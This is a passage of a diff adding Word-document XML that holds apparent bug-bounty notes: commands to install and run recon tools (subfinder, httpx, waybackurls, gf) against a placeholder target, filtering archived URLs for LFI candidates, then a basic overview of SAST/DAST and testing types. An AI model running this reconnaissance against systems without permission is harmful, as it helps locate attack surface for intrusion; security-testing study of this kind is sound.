+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>sudo</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> mv /</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>usr</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>/bin/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>httpx</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> /</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>usr</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>/bin/_</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>httpx</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>$ go install -v github.com/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>projectdiscovery</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>httpx</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>cmd</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>httpx@latest</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>------------------------</w:t>
+      </w:r>
+      <w:r>
+        <w:t>--------------------------------------------------------------------------------------------------</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>SUBFINDER:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>```````````</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>``````</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve">$ </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve">go install -v </w:t>
+      </w:r>
+      <w:hyperlink r:id="rId9" w:history="1">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+            <w:b/>
+            <w:bCs/>
+          </w:rPr>
+          <w:t>github.com/projectdiscovery/subfinder/v2/cmd/subfinder@latest</w:t>
+        </w:r>
+      </w:hyperlink>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>----------------</w:t>
+      </w:r>
+      <w:r>
+        <w:t>start stocking------------</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve">$ </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>subfinder</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> -d target.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>com</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> -all -recursive -silent | tee subs.txt</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>$ cat subs.txt | rev | cut -d'.' -f1-3 | rev | sort -u | tee l1.txt</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve">$ </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>subfinder</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> -dL l1.txt -all -recursive -silent | tee -a subs.txt</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve">$ cat subs.txt | sort -u | </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>httpx</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> -silent | tee alive.txt</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>--------------------------------------------------------------------------------------------------------------------------</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>WAYBACKURLS:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>``````````````</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>````````</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>$ go install github.com/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>tomnomnom</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>waybackurls@latest</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve">$ cat alive.txt | </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>waybackurls</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> | tee wayback.txt</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>--------------------------------------------------------------------------------------------------------------------------</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>GF-PATTERNS:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>````````````</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>````````</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>$ go install github.com/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>tomnomnom</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>gf@latest</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>$ echo 'source $GOPATH/pkg/mod/github.com/tomnomnom/gf@v0.0.0-20200618134122-dcd4c361f9f5/gf-completion.bash' &gt;&gt; ~/.</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>zshrc</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+    </w:p>
+    <w:p/>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t xml:space="preserve">$ </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>mkdir</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> .gf</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>$ cp -r $GOPATH/pkg/mod/github.com/tomnomnom/gf@v0.0.0-20200618134122-dcd4c361f9f5/examples ~/.gf</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>$  git clone https://github.com/1ndianl33t/Gf-Patterns</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve">$ </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>sudo</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> mv Gf-Patterns/*.</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>json</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> ~/.gf</w:t>
+      </w:r>
+      <w:r>
+        <w:t>/</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>--------------------------------------------------------------------------------------------------------------------------</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>Example: LFI:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>``````````````</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>`````</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve">$ cat wayback.txt | gf </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>lfi</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> | </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>httpx</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> -silent | tee lfi.txt</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve">$ cat wayback.txt | gf </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>interestingEXT</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> | </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>httpx</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> -silent | tee interestingEXT.txt</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>--------------------------------------------------------------------------------------------------------------------------</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>Testing:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>```````````</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Static App Security Testing  [</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>SAST</w:t>
+      </w:r>
+      <w:r>
+        <w:t>]</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Dynamic App Security Testing [</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>DAST</w:t>
+      </w:r>
+      <w:r>
+        <w:t>]</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>_______________________</w:t>
+      </w:r>
+      <w:r>
+        <w:t>_____________________________________________</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>Its</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> a part of SDLC, its used to ensure that the code to be deployed with no bug and no logic errors.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Developer ------(code)--------&gt; Tester ---------------&gt; Deploy</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>If error found:-</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>~~~~~~~~~~~~</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Developer --------------&gt; Tester(failed)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:tab/>
+        <w:t>^</w:t>
+      </w:r>
+      <w:r>
+        <w:t>_________________|</w:t>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>Software Testing Classifications:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>~~~~~~~~~~~~~~~~~~~~~~~~~~</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>1) Testing Types:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:tab/>
+        <w:t>- Manual</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:tab/>
+        <w:t>- Automated</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:lastRenderedPageBreak/>
+        <w:t>2) Testing Methods:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:tab/>
+        <w:t>- Static</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:tab/>
+        <w:t>- Dynamic</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>3) Testing Approach:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:tab/>
+        <w:t>- Black Box</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:tab/>
+        <w:t>- White Box</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:tab/>
+        <w:t>- Grey Box</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>4) Testing Levels:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:tab/>
+        <w:t>- Unit testing</w:t>
+      </w:r>
+      <w:r>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:tab/>
+        <w:t>[ Where each module tested separately ]</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:tab/>
+        <w:t>- Integration testing</w:t>
+      </w:r>
+      <w:r>
+        <w:tab/>
+        <w:t>[ Set of modules ]</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:tab/>
+        <w:t>- System testing</w:t>
+      </w:r>
+      <w:r>
+        <w:tab/>
+        <w:t>[ Whole system ]</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:tab/>
+        <w:t>- Acceptance testing</w:t>
+      </w:r>
+      <w:r>
+        <w:tab/>
+        <w:t xml:space="preserve">[ To </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>fulfill</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> the requirements of client/customer ]</w:t>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>[+] Dynamic Testing:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>````````````````````</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>`````````</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Dynamic testing performs during the execution of the code to detect vulnerabilities.</w:t>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>Testing Env:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:tab/>
+        <w:t>|------(if no errors)-----&gt; Deployment</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:tab/>
+        <w:t>|</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Developer -----1------&gt; Code --------2------&gt; Testing</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:tab/>
+        <w:t>^</w:t>
+      </w:r>
+      <w:r>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:tab/>
+        <w:t>|</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:tab/>
+        <w:t>|</w:t>
+      </w:r>
+      <w:r>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:tab/>
+        <w:t>|------(if error found)----\</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:tab/>
+        <w:t>|</w:t>
+      </w:r>
+      <w:r>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:tab/>
+        <w:t xml:space="preserve">  |</w:t>
+      </w:r>
+      <w:r>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:tab/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:tab/>
+        <w:t>|____________________________________|</w:t>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>Static/Dynamic Testing Tools:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>- Selenium</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:lastRenderedPageBreak/>
+        <w:t xml:space="preserve">- </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>CasperJS</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>- etc....</w:t>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>[+] Static Testing:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>````````````````````</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
